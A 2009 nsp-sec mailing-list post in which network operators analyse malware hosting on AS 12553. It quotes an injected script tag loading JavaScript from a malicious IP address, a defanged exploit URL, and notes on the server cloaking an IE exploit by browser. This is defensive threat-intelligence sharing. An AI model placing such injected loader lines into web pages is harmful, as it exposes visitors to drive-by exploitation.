[nsp-sec] ATTN AS 12553 malware hosting
Mike Tancsa
mike at sentex.net
Wed Apr 8 11:22:50 EDT 2009
At 11:07 AM 4/8/2009, Jose Nazario wrote:
>On Wed, 8 Apr 2009, Mike Tancsa wrote:
>
>><script src = //94.247.2.195 / jquery.js> </script>
>
>despite the following which says its benign:
>
>http://wepawet.cs.ucsb.edu/view.php?hash=8f39008bc3088b58c32e1c6f1559ae50&type=js
>
>phoneyc finds an issue. it leads to:
>
> hxxp://94.247.2.195/news/?id=100
>
>which is doubly encoded and leads to some VBS and some JS that looks
>like an IE exploit. AV did not detect the encoded script with any assistance.
The server is smart enough to give different responses based on the
browser. I initially used just fetch, but then my collegue used a
perl script to say he was IE6 on windows XP. The response was a
different script
The file attached contains more obfuscated code.
---Mike
More information about the nsp-security
mailing list